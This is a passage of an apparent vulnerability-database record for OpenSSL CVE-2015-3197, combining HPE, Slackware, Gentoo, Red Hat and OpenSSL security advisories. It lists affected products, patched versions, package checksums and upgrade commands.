          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL \u0027no-ssl3\u0027 Build Option Security Bypass Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "70585"
      }
    ],
    "trust": 0.3
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "70585"
      }
    ],
    "trust": 0.3
  }
}

VAR-201602-0272

Vulnerability from variot - Updated: 2024-07-23 21:05

ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions. OpenSSL may generate unsafe primes for use in the Diffie-Hellman protocol, which may lead to disclosure of enough information for an attacker to recover the private encryption key. OpenSSL is prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to perform unauthorized actions. This may lead to other attacks. Cisco Unified Computing System Central Software is prone to an arbitrary command-execution vulnerability. An attacker can exploit this issue to execute system commands on the underlying operating system. This issue being tracked by Cisco Bug ID CSCut46961. Description:

Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05390893

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05390893 Version: 1

HPESBHF03703 rev.1 - HPE Network Products including Comware v7 and VCX using OpenSSL, Remote Unauthorized Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-02-14 Last Updated: 2017-02-14

Potential Security Impact: Remote: Unauthorized Disclosure of Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed in HPE Network Products including Comware v7 and VCX. The vulnerabilities could be remotely exploited resulting in disclosure of information.

References:

CVE-2015-3197 - OpenSSL, Remote unauthorized disclosure of information
CVE-2016-0701 - OpenSSL, Remote unauthorized disclosure of information

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

VCX Products all prior versions - impacted by CVE-2015-3197 only. Please refer to the RESOLUTION below for a list of updated products.
Comware 7 (CW7) Products all prior versions - impacted by CVE-2015-3197 and CVE-2016-0701. Please refer to the RESOLUTION below for a list of updated products.

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2015-3197
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

CVE-2016-0701
  3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
  2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following software updates to resolve the vulnerability in the Comware v7 and VCX products.

COMWARE 7 Products

12500 (Comware 7) - Version: R7377P01
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2015-3197
- CVE-2016-0701
10500 (Comware 7) - Version: R7183
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
12900 (Comware 7) - Version: R1150
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2015-3197
- CVE-2016-0701
5900 (Comware 7) - Version: R2432P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2015-3197
- CVE-2016-0701
MSR1000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
MSR2000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
MSR3000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG409A HP MSR3012 AC Router
- JG409B HPE MSR3012 AC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
MSR4000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
MSR95X - Version: R0306P30
- HP Network Products
- JH296A HPE MSR954 1GbE SFP 2GbE-WAN 4GbE-LAN CWv7 Router
- JH297A HPE MSR954-W 1GbE SFP (WW) 2GbE-WAN 4GbE-LAN Wireless 802.11n CWv7 Router
- JH298A HPE MSR954-W 1GbE SFP LTE (AM) 2GbE-WAN 4GbE-LAN Wireless 802.11n CWv7 Router
- JH299A HPE MSR954-W 1GbE SFP LTE (WW) 2GbE-WAN 4GbE-LAN Wireless 802.11n CWv7 Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
VSR (Comware 7) - Version: E0322P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
7900 (Comware 7) - Version: R2150
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
5130EI (Comware 7) - Version: R3113P02
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
6125XLG - Version: R2432P01
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2015-3197
- CVE-2016-0701
6127XLG - Version: R2432P01
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2015-3197
- CVE-2016-0701
Moonshot - Version: R2432P01
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2015-3197
- CVE-2016-0701
5700 (Comware 7) - Version: R2432P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
5930 (Comware 7) - Version: R2432P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
1950 (Comware 7) - Version: R3113P02
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
7500 (Comware 7) - Version: R7183
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
5130HI - Version: R1120P07
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
5510HI - Version: R1120P07
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2015-3197

Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY Version:1 (rev.1) - 14 February 2017 Initial release

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1r-i486-1_slack14.1.txz: Upgraded. This update fixes the following security issue: SSLv2 doesn't block disabled ciphers (CVE-2015-3197). +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1r-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1r-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1r-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1r-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz

Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2f-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2f-i586-1.txz

Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2f-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2f-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 14.0 packages: 0d6e8d3b27326c84b9996ed189868eba openssl-1.0.1r-i486-1_slack14.0.txz e3cb0b75e9df4be9d8fd1cfcd2fbd306 openssl-solibs-1.0.1r-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages: 7b52f4a43b42703a6840945d55f503ee openssl-1.0.1r-x86_64-1_slack14.0.txz eee92cb549bacae21e63bee22b9bb8d4 openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz

Slackware 14.1 packages: 5be72ab551b2064aa34c83b42a07ff85 openssl-1.0.1r-i486-1_slack14.1.txz b28e00a7124822258cfd137ab5ce0572 openssl-solibs-1.0.1r-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages: 8e0273b1e99e8caa48fcab2547f051e9 openssl-1.0.1r-x86_64-1_slack14.1.txz 60f3994c35679455cab7a984493d1fdb openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz

Slackware -current packages: 509771b1f7d58a682feb2099fdf3eb5d a/openssl-solibs-1.0.2f-i586-1.txz d72c0188f4223d1dc2d6080f8d99d92e n/openssl-1.0.2f-i586-1.txz

Slackware x86_64 -current packages: 0c6653d3c37271f9f1a58a8c0e1f7b40 a/openssl-solibs-1.0.2f-x86_64-1.txz e4ebd1204644ea58e1779187fe071428 n/openssl-1.0.2f-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg openssl-1.0.1r-i486-1_slack14.1.txz openssl-solibs-1.0.1r-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

Gentoo Linux Security Advisory GLSA 201601-05

                                       https://security.gentoo.org/

Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: January 29, 2016 Bugs: #572854 ID: 201601-05

Synopsis

Multiple vulnerabilities have been found in OpenSSL, allowing remote attackers to disclose sensitive information and complete weak handshakes.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 dev-libs/openssl < 1.0.2f >= 1.0.2f

Description

Multiple vulnerabilities have been discovered in OpenSSL. Please review the upstream advisory and CVE identifiers referenced below for details.

Workaround

There is no known workaround at this time.

Resolution

All OpenSSL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2f"

References

[ 1 ] CVE-2015-3197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3197 [ 2 ] CVE-2016-0701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0701 [ 3 ] OpenSSL Security Advisory [28th Jan 2016] http://openssl.org/news/secadv/20160128.txt

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201601-05

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: openssl098e security update Advisory ID: RHSA-2016:0372-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0372.html Issue date: 2016-03-09 CVE Names: CVE-2015-0293 CVE-2015-3197 CVE-2016-0703 CVE-2016-0704 CVE-2016-0800 =====================================================================

Summary:

Updated openssl098e packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.

A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker can potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN. (CVE-2016-0800)

Note: This issue was addressed by disabling the SSLv2 protocol by default when using the 'SSLv23' connection methods, and removing support for weak SSLv2 cipher suites. For more information, refer to the knowledge base article linked to in the References section.

It was discovered that the SSLv2 servers using OpenSSL accepted SSLv2 connection handshakes that indicated non-zero clear key length for non-export cipher suites. An attacker could use this flaw to decrypt recorded SSLv2 sessions with the server by using it as a decryption oracle.(CVE-2016-0703)

It was discovered that the SSLv2 protocol implementation in OpenSSL did not properly implement the Bleichenbacher protection for export cipher suites. An attacker could use a SSLv2 server using OpenSSL as a Bleichenbacher oracle.

A denial of service flaw was found in the way OpenSSL handled SSLv2 handshake messages. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks. (CVE-2015-3197)

Red Hat would like to thank the OpenSSL project for reporting these issues. Upstream acknowledges Nimrod Aviram and Sebastian Schinzel as the original reporters of CVE-2016-0800 and CVE-2015-3197; David Adrian (University of Michigan) and J. Alex Halderman (University of Michigan) as the original reporters of CVE-2016-0703 and CVE-2016-0704; and Sean Burford (Google) and Emilia Käsper (OpenSSL development team) as the original reporters of CVE-2015-0293. For the update to take effect, all services linked to the openssl098e library must be restarted, or the system rebooted.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1202404 - CVE-2015-0293 openssl: assertion failure in SSLv2 servers 1301846 - CVE-2015-3197 OpenSSL: SSLv2 doesn't block disabled ciphers 1310593 - CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN) 1310811 - CVE-2016-0703 openssl: Divide-and-conquer session key recovery in SSLv2 1310814 - CVE-2016-0704 openssl: SSLv2 Bleichenbacher protection overwrites wrong bytes for export ciphers

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm

i386: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm

x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm

x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm

i386: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm

ppc64: openssl098e-0.9.8e-20.el6_7.1.ppc.rpm openssl098e-0.9.8e-20.el6_7.1.ppc64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc64.rpm

s390x: openssl098e-0.9.8e-20.el6_7.1.s390.rpm openssl098e-0.9.8e-20.el6_7.1.s390x.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.s390.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.s390x.rpm

x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm

i386: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm

x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm

x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm

x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm

ppc64: openssl098e-0.9.8e-29.el7_2.3.ppc.rpm openssl098e-0.9.8e-29.el7_2.3.ppc64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc64.rpm

s390x: openssl098e-0.9.8e-29.el7_2.3.s390.rpm openssl098e-0.9.8e-29.el7_2.3.s390x.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.s390.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.s390x.rpm

x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm

x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2015-0293 https://access.redhat.com/security/cve/CVE-2015-3197 https://access.redhat.com/security/cve/CVE-2016-0703 https://access.redhat.com/security/cve/CVE-2016-0704 https://access.redhat.com/security/cve/CVE-2016-0800 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/2176731 https://drownattack.com/ https://openssl.org/news/secadv/20160128.txt https://openssl.org/news/secadv/20160301.txt

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFW36N0XlSAg2UNWIIRAqYBAJ98/98OOTx9c6LlkPHMl7SfneXccQCfX2LY BQ+47lH1uQT1a3RxlYkETOk= =TqD1 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. OpenSSL Security Advisory [28th Jan 2016] =========================================

NOTE: SUPPORT FOR VERSION 1.0.1 WILL BE ENDING ON 31ST DECEMBER 2016. NO SECURITY FIXES WILL BE PROVIDED AFTER THAT DATE. UNTIL THAT TIME SECURITY FIXES ONLY ARE BEING APPLIED.

DH small subgroups (CVE-2016-0701)

Severity: High

